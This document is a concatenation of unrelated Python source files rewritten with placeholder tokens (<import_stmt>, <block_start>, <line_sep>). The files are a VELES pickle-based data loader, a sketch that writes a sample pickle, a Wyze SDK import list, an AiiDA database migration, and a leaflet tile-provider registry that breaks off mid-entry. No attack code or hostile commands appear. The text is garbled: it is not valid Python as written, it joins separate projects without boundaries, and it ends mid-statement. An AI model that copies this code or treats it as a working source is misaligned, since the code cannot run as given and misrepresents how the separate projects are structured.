# -*- coding: utf-8 -*- """ .. invisible: _ _ _____ _ _____ _____ | | | | ___| | | ___/ ___| | | | | |__ | | | |__ \ `--. | | | | __|| | | __| `--. \ \ \_/ / |___| |___| |___/\__/ / \___/\____/\_____|____/\____/ Created on Jan 25, 2015 Loaders which get data from pickles ███████████████████████████████████████████████████████████████████████████████ Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ███████████████████████████████████████████████████████████████████████████████ """<import_stmt>pickle<import_stmt>numpy<import_stmt>six<import_from_stmt>zope.interface implementer<import_from_stmt>veles error<import_from_stmt>veles.compat from_none<import_from_stmt>veles.external.progressbar ProgressBar<import_from_stmt>veles.memory interleave<import_from_stmt>veles.loader.base CLASS_NAME Loader<import_from_stmt>veles.loader.image IImageLoader COLOR_CHANNELS_MAP<import_from_stmt>veles.loader.fullbatch FullBatchLoader IFullBatchLoader<import_from_stmt>veles.loader.fullbatch_image FullBatchImageLoader<line_sep>@implementer(IFullBatchLoader)<class_stmt>PicklesLoader(FullBatchLoader)<block_start>""" Loads samples from pickles for data set. """<def_stmt>__init__ self workflow **kwargs<block_start>super(PicklesLoader self).__init__(workflow **kwargs)<line_sep>self._test_pickles=list(kwargs.get("test_pickles" []))<line_sep>self._validation_pickles=list(kwargs.get("validation_pickles" []))<line_sep>self._train_pickles=list(kwargs.get("train_pickles" []))<line_sep>self._pickles=(self.test_pickles self.validation_pickles self.train_pickles)<block_end>@property<def_stmt>test_pickles self<block_start><return>self._test_pickles<block_end>@property<def_stmt>validation_pickles self<block_start><return>self._validation_pickles<block_end>@property<def_stmt>train_pickles self<block_start><return>self._train_pickles<block_end><def_stmt>reshape self shape<block_start><return>shape<block_end><def_stmt>transform_data self data<block_start><return>data<block_end><def_stmt>load_data self<block_start>pbar=ProgressBar(maxval=sum(len(p)<for>p self._pickles) term_width=40)<line_sep>self.info("Loading %d pickles..." 
pbar.maxval)<line_sep>pbar.start()<line_sep>loaded=[self.load_pickles(i self._pickles[i] pbar)<for>i range(3)]<line_sep>pbar.finish()<line_sep>self.info("Initializing the arrays...")<line_sep>shape=loaded[2][1][0].shape[1:]<for_stmt>i range(2)<block_start><if_stmt>loaded[i][0]<g>0<block_start>shi=loaded[i][1][0].shape[1:]<if_stmt>shape<ne>shi<block_start><raise>error.BadFormatError("TRAIN and %s sets have the different sample shape "<concat>"(%s vs %s)"%(CLASS_NAME[i] shape shi))<block_end><block_end><block_end>self.create_originals(self.reshape(shape))<line_sep>offsets=[0 0]<for_stmt>ds range(3)<block_start><if_stmt>loaded[ds][0]<eq>0<block_start><continue><block_end><for_stmt>arr loaded[ds][1]<block_start>self.original_data[offsets[0]:(offsets[0]+arr.shape[0])]=self.transform_data(arr)<line_sep>offsets[0]<augadd>arr.shape[0]<block_end><for_stmt>arr loaded[ds][2]<block_start>self.original_labels[offsets[1]:(offsets[1]+arr.shape[0])]=arr<line_sep>offsets[1]<augadd>arr.shape[0]<block_end><block_end><block_end><def_stmt>load_pickles self index pickles pbar<block_start>unpickled=[]<for_stmt>pick pickles<block_start><try_stmt><block_start><with_stmt>open(pick "rb")<as>fin<block_start>self.debug("Loading %s..." pick)<if_stmt>six.PY3<block_start>loaded=pickle.load(fin encoding='charmap')<block_end><else_stmt><block_start>loaded=pickle.load(fin)<block_end>unpickled.append(loaded)<line_sep>pbar.inc()<block_end><block_end><except_stmt>Exception<as>e<block_start>self.warning("Failed to load %s (part of %s set)"%(pick CLASS_NAME[index]))<line_sep><raise>from_none(e)<block_end><block_end>data=[]<line_sep>labels=[]<for_stmt>obj,pick zip(unpickled pickles)<block_start><if_stmt><not>isinstance(obj dict)<block_start><raise>TypeError("%s has the wrong format (part of %s set)"%(pick CLASS_NAME[index]))<block_end><try_stmt><block_start>data.append(obj["data"])<line_sep>labels.append(numpy.array(obj["labels"] dtype=Loader.LABEL_DTYPE))<block_end><except_stmt>KeyError<as>e<block_start>self.error("%s has the wrong format (part of %s set)" pick CLASS_NAME[index])<line_sep><raise>from_none(e)<block_end><block_end>lengths=[0 sum(len(l)<for>l labels)]<for_stmt>arr data<block_start>lengths[0]<augadd>arr.shape[0]<if_stmt>arr.shape[1:]<ne>data[0].shape[1:]<block_start><raise>error.BadFormatError("Array has a different shape: expected %s, got %s"<concat>"(%s set)"%(data[0].shape[1:] arr.shape[1:] CLASS_NAME[index]))<block_end><block_end><if_stmt>lengths[0]<ne>lengths[1]<block_start><raise>error.BadFormatError("Data and labels has the different number of samples (data %d,"<concat>" labels %d)"%lengths)<block_end>length=lengths[0]<line_sep>self.class_lengths[index]=length<line_sep><return>length data labels<block_end><block_end>@implementer(IImageLoader)<class_stmt>PicklesImageFullBatchLoader(PicklesLoader FullBatchImageLoader)<block_start>MAPPING="full_batch_pickles_image"<def_stmt>__init__ self workflow **kwargs<block_start>super(PicklesImageFullBatchLoader self).__init__(workflow **kwargs)<line_sep># Since we can not extract the color space information from pickles # set it explicitly without any default value self.color_space=kwargs["color_space"]<block_end><def_stmt>get_image_label self key<block_start><return>int(self.image_labels[key])<block_end><def_stmt>get_image_info self key<block_start><return>self.image_data[key].shape[:2] self.color_space<block_end><def_stmt>get_image_data self key<block_start><return>self.image_data[key]<block_end><def_stmt>get_keys self index<block_start>offsets=[0 self.class_lengths[0] 
self.class_lengths[0]+self.class_lengths[1] self.total_samples]<line_sep>self.original_shape=self.image_data.shape[1:-1]<line_sep><return>range(offsets[index] offsets[index+1])<block_end><def_stmt>reshape self shape<block_start><if_stmt>shape[0]<eq>COLOR_CHANNELS_MAP[self.color_space]<block_start><return>shape[1:]+(shape[0] )<block_end><return>shape<block_end><def_stmt>transform_data self data<block_start><if_stmt>data.shape[1]<eq>COLOR_CHANNELS_MAP[self.color_space]<block_start><return>interleave(data)<block_end><return>data<block_end><def_stmt>load_data self<block_start>PicklesLoader.load_data(self)<line_sep>self.original_class_lengths=self.class_lengths<line_sep>self.image_data=self.original_data.mem<line_sep>self.original_data.mem=<none><line_sep>self.image_labels=self.original_labels[:]<del_stmt>self.original_labels[:]<line_sep>FullBatchImageLoader.load_data(self)<assert_stmt>self.original_class_lengths<eq>self.class_lengths<del_stmt>self.image_data<block_end><def_stmt>initialize self device **kwargs<block_start>super(PicklesImageFullBatchLoader self).initialize(device=device **kwargs)<del_stmt>self.image_labels<block_end><block_end>
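# A hypothetical sketch of the pickle layout load_pickles() expects: each file holds a dict with a "data" array of samples and a matching "labels" sequence. The file name, sample shape and label values are illustrative. <import_stmt>pickle<import_stmt>numpy<line_sep>samples=numpy.random.rand(10 32 32 3).astype(numpy.float32)<line_sep>labels=numpy.arange(10)<with_stmt>open("train_part0.pickle" "wb")<as>fout<block_start>pickle.dump({"data":samples "labels":labels} fout)<block_end>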
<import_from_stmt>.api_service ApiServiceClient# noqa <import_from_stmt>.auth_service AuthServiceClient# noqa <import_from_stmt>.earth_service EarthServiceClient# noqa <import_from_stmt>.ford_service FordServiceClient# noqa <import_from_stmt>.general_api_service GeneralApiServiceClient# noqa <import_from_stmt>.platform_service PlatformServiceClient# noqa <import_from_stmt>.scale_service ScaleServiceClient# noqa <import_from_stmt>.venus_service VenusServiceClient# noqa <import_from_stmt>.wyze_response WyzeResponse# noqa
# -*- coding: utf-8 -*- ########################################################################### # Copyright (c), The AiiDA team. All rights reserved. # # This file is part of the AiiDA code. # # # # The code is hosted on GitHub at https://github.com/aiidateam/aiida-core # # For further information on the license, see the LICENSE.txt file # # For further information please visit http://www.aiida.net # ########################################################################### # pylint: disable=invalid-name,no-member """Drop the DbCalcState table Revision ID: <KEY> Revises: a603da2cc809 Create Date: 2018-11-14 08:37:13.719646 """<import_from_stmt>alembic op<import_stmt>sqlalchemy<as>sa<import_from_stmt>sqlalchemy.dialects postgresql<line_sep># revision identifiers, used by Alembic. revision='<KEY>'<line_sep>down_revision='a603da2cc809'<line_sep>branch_labels=<none><line_sep>depends_on=<none><def_stmt>upgrade <block_start>op.drop_table('db_dbcalcstate')<block_end><def_stmt>downgrade <block_start>op.create_table('db_dbcalcstate' sa.Column('id' sa.INTEGER() nullable=<false>) sa.Column('dbnode_id' sa.INTEGER() autoincrement=<false> nullable=<true>) sa.Column('state' sa.VARCHAR(length=255) autoincrement=<false> nullable=<true>) sa.Column('time' postgresql.TIMESTAMP(timezone=<true>) autoincrement=<false> nullable=<true>) sa.ForeignKeyConstraint(['dbnode_id'] ['db_dbnode.id'] name='db_dbcalcstate_dbnode_id_fkey' ondelete='CASCADE' initially='DEFERRED' deferrable=<true>) sa.PrimaryKeyConstraint('id' name='db_dbcalcstate_pkey') sa.UniqueConstraint('dbnode_id' 'state' name='db_dbcalcstate_dbnode_id_state_key'))<block_end>
""" Tile providers. This file is autogenerated! It is a python representation of the leaflet providers defined by the leaflet-providers.js extension to Leaflet (https://github.com/leaflet-extras/leaflet-providers). Credit to the leaflet-providers.js project (BSD 2-Clause "Simplified" License) and the Leaflet Providers contributors. Generated by parse_leaflet_providers.py at 2019-08-01 from leaflet-providers at commit 9eb968f8442ea492626c9c8f0dac8ede484e6905 (Bumped version to 1.8.0). """<class_stmt>Bunch(dict)<block_start>"""A dict with attribute-access"""<def_stmt>__getattr__ self key<block_start><try_stmt><block_start><return>self.__getitem__(key)<block_end><except_stmt>KeyError<block_start><raise>AttributeError(key)<block_end><block_end><def_stmt>__dir__ self<block_start><return>self.keys()<block_end><block_end><class_stmt>TileProvider(Bunch)<block_start>""" A dict with attribute-access and that can be called to update keys """<def_stmt>__call__ self **kwargs<block_start>new=TileProvider(self)# takes a copy preserving the class new.update(kwargs)<line_sep><return>new<block_end><block_end>providers=Bunch(OpenStreetMap=Bunch(Mapnik=TileProvider(url='https://{s}.tile.openstreetmap.org/{z}/{x}/{y}.png' max_zoom=19 attribution='(C) OpenStreetMap contributors' name='OpenStreetMap.Mapnik') DE=TileProvider(url='https://{s}.tile.openstreetmap.de/tiles/osmde/{z}/{x}/{y}.png' max_zoom=18 attribution='(C) OpenStreetMap contributors' name='OpenStreetMap.DE') CH=TileProvider(url='https://tile.osm.ch/switzerland/{z}/{x}/{y}.png' max_zoom=18 attribution='(C) OpenStreetMap contributors' bounds=[[45 5] [48 11]] name='OpenStreetMap.CH') France=TileProvider(url='https://{s}.tile.openstreetmap.fr/osmfr/{z}/{x}/{y}.png' max_zoom=20 attribution='(C) Openstreetmap France | (C) OpenStreetMap contributors' name='OpenStreetMap.France') HOT=TileProvider(url='https://{s}.tile.openstreetmap.fr/hot/{z}/{x}/{y}.png' max_zoom=19 attribution='(C) OpenStreetMap contributors, Tiles style by Humanitarian OpenStreetMap Team hosted by OpenStreetMap France' name='OpenStreetMap.HOT') BZH=TileProvider(url='https://tile.openstreetmap.bzh/br/{z}/{x}/{y}.png' max_zoom=19 attribution='(C) OpenStreetMap contributors, Tiles courtesy of Breton OpenStreetMap Team' bounds=[[46.2 -5.5] [50 0.7]] name='OpenStreetMap.BZH')) OpenSeaMap=TileProvider(url='https://tiles.openseamap.org/seamark/{z}/{x}/{y}.png' attribution='Map data: (C) OpenSeaMap contributors' name='OpenSeaMap') OpenPtMap=TileProvider(url='http://openptmap.org/tiles/{z}/{x}/{y}.png' max_zoom=17 attribution='Map data: (C) OpenPtMap contributors' name='OpenPtMap') OpenTopoMap=TileProvider(url='https://{s}.tile.opentopomap.org/{z}/{x}/{y}.png' max_zoom=17 attribution='Map data: (C) OpenStreetMap contributors, SRTM | Map style: (C) OpenTopoMap (CC-BY-SA)' name='OpenTopoMap') OpenRailwayMap=TileProvider(url='https://{s}.tiles.openrailwaymap.org/standard/{z}/{x}/{y}.png' max_zoom=19 attribution='Map data: (C) OpenStreetMap contributors | Map style: (C) OpenRailwayMap (CC-BY-SA)' name='OpenRailwayMap') OpenFireMap=TileProvider(url='http://openfiremap.org/hytiles/{z}/{x}/{y}.png' max_zoom=19 attribution='Map data: (C) OpenStreetMap contributors | Map style: (C) OpenFireMap (CC-BY-SA)' name='OpenFireMap') SafeCast=TileProvider(url='https://s3.amazonaws.com/te512.safecast.org/{z}/{x}/{y}.png' max_zoom=16 attribution='Map data: (C) OpenStreetMap contributors | Map style: (C) SafeCast (CC-BY-SA)' name='SafeCast') 
Thunderforest=Bunch(OpenCycleMap=TileProvider(url='https://{s}.tile.thunderforest.com/{variant}/{z}/{x}/{y}.png?apikey={apikey}' attribution='(C) Thunderforest, (C) OpenStreetMap contributors' variant='cycle' apikey='<insert your api key here>' max_zoom=22 name='Thunderforest.OpenCycleMap') Transport=TileProvider(url='https://{s}.tile.thunderforest.com/{variant}/{z}/{x}/{y}.png?apikey={apikey}' attribution='(C) Thunderforest, (C) OpenStreetMap contributors' variant='transport' apikey='<insert your api key here>' max_zoom=22 name='Thunderforest.Transport') TransportDark=TileProvider(url='https://{s}.tile.thunderforest.com/{variant}/{z}/{x}/{y}.png?apikey={apikey}' attribution='(C) Thunderforest, (C) OpenStreetMap contributors' variant='transport-dark' apikey='<insert your api key here>' max_zoom=22 name='Thunderforest.TransportDark') SpinalMap=TileProvider(url='https://{s}.tile.thunderforest.com/{variant}/{z}/{x}/{y}.png?apikey={apikey}' attribution='(C) Thunderforest, (C) OpenStreetMap contributors' variant='spinal-map' apikey='<insert your api key here>' max_zoom=22 name='Thunderforest.SpinalMap') Landscape=TileProvider(url='https://{s}.tile.thunderforest.com/{variant}/{z}/{x}/{y}.png?apikey={apikey}' attribution='(C) Thunderforest, (C) OpenStreetMap contributors' variant='landscape' apikey='<insert your api key here>' max_zoom=22 name='Thunderforest.Landscape') Outdoors=TileProvider(url='https://{s}.tile.thunderforest.com/{variant}/{z}/{x}/{y}.png?apikey={apikey}' attribution='(C) Thunderforest, (C) OpenStreetMap contributors' variant='outdoors' apikey='<insert your api key here>' max_zoom=22 name='Thunderforest.Outdoors') Pioneer=TileProvider(url='https://{s}.tile.thunderforest.com/{variant}/{z}/{x}/{y}.png?apikey={apikey}' attribution='(C) Thunderforest, (C) OpenStreetMap contributors' variant='pioneer' apikey='<insert your api key here>' max_zoom=22 name='Thunderforest.Pioneer') MobileAtlas=TileProvider(url='https://{s}.tile.thunderforest.com/{variant}/{z}/{x}/{y}.png?apikey={apikey}' attribution='(C) Thunderforest, (C) OpenStreetMap contributors' variant='mobile-atlas' apikey='<insert your api key here>' max_zoom=22 name='Thunderforest.MobileAtlas') Neighbourhood=TileProvider(url='https://{s}.tile.thunderforest.com/{variant}/{z}/{x}/{y}.png?apikey={apikey}' attribution='(C) Thunderforest, (C) OpenStreetMap contributors' variant='neighbourhood' apikey='<insert your api key here>' max_zoom=22 name='Thunderforest.Neighbourhood')) OpenMapSurfer=Bunch(Roads=TileProvider(url='https://maps.heigit.org/openmapsurfer/tiles/{variant}/webmercator/{z}/{x}/{y}.png' max_zoom=19 variant='roads' attribution='Imagery from GIScience Research Group @ University of Heidelberg | Map data (C) OpenStreetMap contributors' name='OpenMapSurfer.Roads') Hybrid=TileProvider(url='https://maps.heigit.org/openmapsurfer/tiles/{variant}/webmercator/{z}/{x}/{y}.png' max_zoom=19 variant='hybrid' attribution='Imagery from GIScience Research Group @ University of Heidelberg | Map data (C) OpenStreetMap contributors' name='OpenMapSurfer.Hybrid') AdminBounds=TileProvider(url='https://maps.heigit.org/openmapsurfer/tiles/{variant}/webmercator/{z}/{x}/{y}.png' max_zoom=18 variant='adminb' attribution='Imagery from GIScience Research Group @ University of Heidelberg | Map data (C) OpenStreetMap contributors' name='OpenMapSurfer.AdminBounds') ContourLines=TileProvider(url='https://maps.heigit.org/openmapsurfer/tiles/{variant}/webmercator/{z}/{x}/{y}.png' max_zoom=18 variant='asterc' attribution='Imagery from GIScience Research 
Group @ University of Heidelberg | Map data ASTER GDEM' min_zoom=13 name='OpenMapSurfer.ContourLines') Hillshade=TileProvider(url='https://maps.heigit.org/openmapsurfer/tiles/{variant}/webmercator/{z}/{x}/{y}.png' max_zoom=18 variant='asterh' attribution='Imagery from GIScience Research Group @ University of Heidelberg | Map data ASTER GDEM, SRTM' name='OpenMapSurfer.Hillshade') ElementsAtRisk=TileProvider(url='https://maps.heigit.org/openmapsurfer/tiles/{variant}/webmercator/{z}/{x}/{y}.png' max_zoom=19 variant='elements_at_risk' attribution='Imagery from GIScience Research Group @ University of Heidelberg | Map data (C) OpenStreetMap contributors' name='OpenMapSurfer.ElementsAtRisk')) Hydda=Bunch(Full=TileProvider(url='https://{s}.tile.openstreetmap.se/hydda/{variant}/{z}/{x}/{y}.png' max_zoom=18 variant='full' attribution='Tiles courtesy of OpenStreetMap Sweden -- Map data (C) OpenStreetMap contributors' name='Hydda.Full') Base=TileProvider(url='https://{s}.tile.openstreetmap.se/hydda/{variant}/{z}/{x}/{y}.png' max_zoom=18 variant='base' attribution='Tiles courtesy of OpenStreetMap Sweden -- Map data (C) OpenStreetMap contributors' name='Hydda.Base') RoadsAndLabels=TileProvider(url='https://{s}.tile.openstreetmap.se/hydda/{variant}/{z}/{x}/{y}.png' max_zoom=18 variant='roads_and_labels' attribution='Tiles courtesy of OpenStreetMap Sweden -- Map data (C) OpenStreetMap contributors' name='Hydda.RoadsAndLabels')) MapBox=TileProvider(url='https://api.tiles.mapbox.com/v4/{id}/{z}/{x}/{y}{r}.png?access_token={accessToken}' attribution='(C) Mapbox (C) OpenStreetMap contributors Improve this map' subdomains='abcd' id='mapbox.streets' accessToken='<insert your access token here>' name='MapBox') Stamen=Bunch(Toner=TileProvider(url='https://stamen-tiles-{s}.a.ssl.fastly.net/{variant}/{z}/{x}/{y}{r}.{ext}' attribution='Map tiles by Stamen Design, CC BY 3.0 -- Map data (C) OpenStreetMap contributors' subdomains='abcd' min_zoom=0 max_zoom=20 variant='toner' ext='png' name='Stamen.Toner') TonerBackground=TileProvider(url='https://stamen-tiles-{s}.a.ssl.fastly.net/{variant}/{z}/{x}/{y}{r}.{ext}' attribution='Map tiles by Stamen Design, CC BY 3.0 -- Map data (C) OpenStreetMap contributors' subdomains='abcd' min_zoom=0 max_zoom=20 variant='toner-background' ext='png' name='Stamen.TonerBackground') TonerHybrid=TileProvider(url='https://stamen-tiles-{s}.a.ssl.fastly.net/{variant}/{z}/{x}/{y}{r}.{ext}' attribution='Map tiles by Stamen Design, CC BY 3.0 -- Map data (C) OpenStreetMap contributors' subdomains='abcd' min_zoom=0 max_zoom=20 variant='toner-hybrid' ext='png' name='Stamen.TonerHybrid') TonerLines=TileProvider(url='https://stamen-tiles-{s}.a.ssl.fastly.net/{variant}/{z}/{x}/{y}{r}.{ext}' attribution='Map tiles by Stamen Design, CC BY 3.0 -- Map data (C) OpenStreetMap contributors' subdomains='abcd' min_zoom=0 max_zoom=20 variant='toner-lines' ext='png' name='Stamen.TonerLines') TonerLabels=TileProvider(url='https://stamen-tiles-{s}.a.ssl.fastly.net/{variant}/{z}/{x}/{y}{r}.{ext}' attribution='Map tiles by Stamen Design, CC BY 3.0 -- Map data (C) OpenStreetMap contributors' subdomains='abcd' min_zoom=0 max_zoom=20 variant='toner-labels' ext='png' name='Stamen.TonerLabels') TonerLite=TileProvider(url='https://stamen-tiles-{s}.a.ssl.fastly.net/{variant}/{z}/{x}/{y}{r}.{ext}' attribution='Map tiles by Stamen Design, CC BY 3.0 -- Map data (C) OpenStreetMap contributors' subdomains='abcd' min_zoom=0 max_zoom=20 variant='toner-lite' ext='png' name='Stamen.TonerLite') 
Watercolor=TileProvider(url='https://stamen-tiles-{s}.a.ssl.fastly.net/{variant}/{z}/{x}/{y}.{ext}' attribution='Map tiles by Stamen Design, CC BY 3.0 -- Map data (C) OpenStreetMap contributors' subdomains='abcd' min_zoom=1 max_zoom=16 variant='watercolor' ext='jpg' name='Stamen.Watercolor') Terrain=TileProvider(url='https://stamen-tiles-{s}.a.ssl.fastly.net/{variant}/{z}/{x}/{y}{r}.{ext}' attribution='Map tiles by Stamen Design, CC BY 3.0 -- Map data (C) OpenStreetMap contributors' subdomains='abcd' min_zoom=0 max_zoom=18 variant='terrain' ext='png' name='Stamen.Terrain') TerrainBackground=TileProvider(url='https://stamen-tiles-{s}.a.ssl.fastly.net/{variant}/{z}/{x}/{y}{r}.{ext}' attribution='Map tiles by Stamen Design, CC BY 3.0 -- Map data (C) OpenStreetMap contributors' subdomains='abcd' min_zoom=0 max_zoom=18 variant='terrain-background' ext='png' name='Stamen.TerrainBackground') TopOSMRelief=TileProvider(url='https://stamen-tiles-{s}.a.ssl.fastly.net/{variant}/{z}/{x}/{y}.{ext}' attribution='Map tiles by Stamen Design, CC BY 3.0 -- Map data (C) OpenStreetMap contributors' subdomains='abcd' min_zoom=0 max_zoom=20 variant='toposm-color-relief' ext='jpg' bounds=[[22 -132] [51 -56]] name='Stamen.TopOSMRelief') TopOSMFeatures=TileProvider(url='https://stamen-tiles-{s}.a.ssl.fastly.net/{variant}/{z}/{x}/{y}{r}.{ext}' attribution='Map tiles by Stamen Design, CC BY 3.0 -- Map data (C) OpenStreetMap contributors' subdomains='abcd' min_zoom=0 max_zoom=20 variant='toposm-features' ext='png' bounds=[[22 -132] [51 -56]] opacity=0.9 name='Stamen.TopOSMFeatures')) Esri=Bunch(WorldStreetMap=TileProvider(url='https://server.arcgisonline.com/ArcGIS/rest/services/{variant}/MapServer/tile/{z}/{y}/{x}' variant='World_Street_Map' attribution='Tiles (C) Esri -- Source: Esri, DeLorme, NAVTEQ, USGS, Intermap, iPC, NRCAN, Esri Japan, METI, Esri China (Hong Kong), Esri (Thailand), TomTom, 2012' name='Esri.WorldStreetMap') DeLorme=TileProvider(url='https://server.arcgisonline.com/ArcGIS/rest/services/{variant}/MapServer/tile/{z}/{y}/{x}' variant='Specialty/DeLorme_World_Base_Map' attribution='Tiles (C) Esri -- Copyright: (C)2012 DeLorme' min_zoom=1 max_zoom=11 name='Esri.DeLorme') WorldTopoMap=TileProvider(url='https://server.arcgisonline.com/ArcGIS/rest/services/{variant}/MapServer/tile/{z}/{y}/{x}' variant='World_Topo_Map' attribution='Tiles (C) Esri -- Esri, DeLorme, NAVTEQ, TomTom, Intermap, iPC, USGS, FAO, NPS, NRCAN, GeoBase, Kadaster NL, Ordnance Survey, Esri Japan, METI, Esri China (Hong Kong), and the GIS User Community' name='Esri.WorldTopoMap') WorldImagery=TileProvider(url='https://server.arcgisonline.com/ArcGIS/rest/services/{variant}/MapServer/tile/{z}/{y}/{x}' variant='World_Imagery' attribution='Tiles (C) Esri -- Source: Esri, i-cubed, USDA, USGS, AEX, GeoEye, Getmapping, Aerogrid, IGN, IGP, UPR-EGP, and the GIS User Community' name='Esri.WorldImagery') WorldTerrain=TileProvider(url='https://server.arcgisonline.com/ArcGIS/rest/services/{variant}/MapServer/tile/{z}/{y}/{x}' variant='World_Terrain_Base' attribution='Tiles (C) Esri -- Source: USGS, Esri, TANA, DeLorme, and NPS' max_zoom=13 name='Esri.WorldTerrain') WorldShadedRelief=TileProvider(url='https://server.arcgisonline.com/ArcGIS/rest/services/{variant}/MapServer/tile/{z}/{y}/{x}' variant='World_Shaded_Relief' attribution='Tiles (C) Esri -- Source: Esri' max_zoom=13 name='Esri.WorldShadedRelief') WorldPhysical=TileProvider(url='https://server.arcgisonline.com/ArcGIS/rest/services/{variant}/MapServer/tile/{z}/{y}/{x}' 
variant='World_Physical_Map' attribution='Tiles (C) Esri -- Source: US National Park Service' max_zoom=8 name='Esri.WorldPhysical') OceanBasemap=TileProvider(url='https://server.arcgisonline.com/ArcGIS/rest/services/{variant}/MapServer/tile/{z}/{y}/{x}' variant='Ocean_Basemap' attribution='Tiles (C) Esri -- Sources: GEBCO, NOAA, CHS, OSU, UNH, CSUMB, National Geographic, DeLorme, NAVTEQ, and Esri' max_zoom=13 name='Esri.OceanBasemap') NatGeoWorldMap=TileProvider(url='https://server.arcgisonline.com/ArcGIS/rest/services/{variant}/MapServer/tile/{z}/{y}/{x}' variant='NatGeo_World_Map' attribution='Tiles (C) Esri -- National Geographic, Esri, DeLorme, NAVTEQ, UNEP-WCMC, USGS, NASA, ESA, METI, NRCAN, GEBCO, NOAA, iPC' max_zoom=16 name='Esri.NatGeoWorldMap') WorldGrayCanvas=TileProvider(url='https://server.arcgisonline.com/ArcGIS/rest/services/{variant}/MapServer/tile/{z}/{y}/{x}' variant='Canvas/World_Light_Gray_Base' attribution='Tiles (C) Esri -- Esri, DeLorme, NAVTEQ' max_zoom=16 name='Esri.WorldGrayCanvas')) OpenWeatherMap=Bunch(Clouds=TileProvider(url='http://{s}.tile.openweathermap.org/map/{variant}/{z}/{x}/{y}.png?appid={apiKey}' max_zoom=19 attribution='Map data (C) OpenWeatherMap' apiKey='<insert your api key here>' opacity=0.5 variant='clouds' name='OpenWeatherMap.Clouds') CloudsClassic=TileProvider(url='http://{s}.tile.openweathermap.org/map/{variant}/{z}/{x}/{y}.png?appid={apiKey}' max_zoom=19 attribution='Map data (C) OpenWeatherMap' apiKey='<insert your api key here>' opacity=0.5 variant='clouds_cls' name='OpenWeatherMap.CloudsClassic') Precipitation=TileProvider(url='http://{s}.tile.openweathermap.org/map/{variant}/{z}/{x}/{y}.png?appid={apiKey}' max_zoom=19 attribution='Map data (C) OpenWeatherMap' apiKey='<insert your api key here>' opacity=0.5 variant='precipitation' name='OpenWeatherMap.Precipitation') PrecipitationClassic=TileProvider(url='http://{s}.tile.openweathermap.org/map/{variant}/{z}/{x}/{y}.png?appid={apiKey}' max_zoom=19 attribution='Map data (C) OpenWeatherMap' apiKey='<insert your api key here>' opacity=0.5 variant='precipitation_cls' name='OpenWeatherMap.PrecipitationClassic') Rain=TileProvider(url='http://{s}.tile.openweathermap.org/map/{variant}/{z}/{x}/{y}.png?appid={apiKey}' max_zoom=19 attribution='Map data (C) OpenWeatherMap' apiKey='<insert your api key here>' opacity=0.5 variant='rain' name='OpenWeatherMap.Rain') RainClassic=TileProvider(url='http://{s}.tile.openweathermap.org/map/{variant}/{z}/{x}/{y}.png?appid={apiKey}' max_zoom=19 attribution='Map data (C) OpenWeatherMap' apiKey='<insert your api key here>' opacity=0.5 variant='rain_cls' name='OpenWeatherMap.RainClassic') Pressure=TileProvider(url='http://{s}.tile.openweathermap.org/map/{variant}/{z}/{x}/{y}.png?appid={apiKey}' max_zoom=19 attribution='Map data (C) OpenWeatherMap' apiKey='<insert your api key here>' opacity=0.5 variant='pressure' name='OpenWeatherMap.Pressure') PressureContour=TileProvider(url='http://{s}.tile.openweathermap.org/map/{variant}/{z}/{x}/{y}.png?appid={apiKey}' max_zoom=19 attribution='Map data (C) OpenWeatherMap' apiKey='<insert your api key here>' opacity=0.5 variant='pressure_cntr' name='OpenWeatherMap.PressureContour') Wind=TileProvider(url='http://{s}.tile.openweathermap.org/map/{variant}/{z}/{x}/{y}.png?appid={apiKey}' max_zoom=19 attribution='Map data (C) OpenWeatherMap' apiKey='<insert your api key here>' opacity=0.5 variant='wind' name='OpenWeatherMap.Wind') 
Temperature=TileProvider(url='http://{s}.tile.openweathermap.org/map/{variant}/{z}/{x}/{y}.png?appid={apiKey}' max_zoom=19 attribution='Map data (C) OpenWeatherMap' apiKey='<insert your api key here>' opacity=0.5 variant='temp' name='OpenWeatherMap.Temperature') Snow=TileProvider(url='http://{s}.tile.openweathermap.org/map/{variant}/{z}/{x}/{y}.png?appid={apiKey}' max_zoom=19 attribution='Map data (C) OpenWeatherMap' apiKey='<insert your api key here>' opacity=0.5 variant='snow' name='OpenWeatherMap.Snow')) HERE=Bunch(normalDay=TileProvider(url='https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}' attribution='Map (C) 1987-2019 HERE' subdomains='1234' mapID='newest' app_id='<insert your app_id here>' app_code='<insert your app_code here>' base='base' variant='normal.day' max_zoom=20 type='maptile' language='eng' format='png8' size='256' name='HERE.normalDay') normalDayCustom=TileProvider(url='https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}' attribution='Map (C) 1987-2019 HERE' subdomains='1234' mapID='newest' app_id='<insert your app_id here>' app_code='<insert your app_code here>' base='base' variant='normal.day.custom' max_zoom=20 type='maptile' language='eng' format='png8' size='256' name='HERE.normalDayCustom') normalDayGrey=TileProvider(url='https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}' attribution='Map (C) 1987-2019 HERE' subdomains='1234' mapID='newest' app_id='<insert your app_id here>' app_code='<insert your app_code here>' base='base' variant='normal.day.grey' max_zoom=20 type='maptile' language='eng' format='png8' size='256' name='HERE.normalDayGrey') normalDayMobile=TileProvider(url='https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}' attribution='Map (C) 1987-2019 HERE' subdomains='1234' mapID='newest' app_id='<insert your app_id here>' app_code='<insert your app_code here>' base='base' variant='normal.day.mobile' max_zoom=20 type='maptile' language='eng' format='png8' size='256' name='HERE.normalDayMobile') normalDayGreyMobile=TileProvider(url='https://{s}.{base}.maps.api.here.com/maptile/2.1/{type}/{mapID}/{variant}/{z}/{x}/{y}/{size}/{format}?app_id={app_id}&app_code={app_code}&lg={language}' attribution='Map (C) 1987-2019 HERE' subdomains='1234' 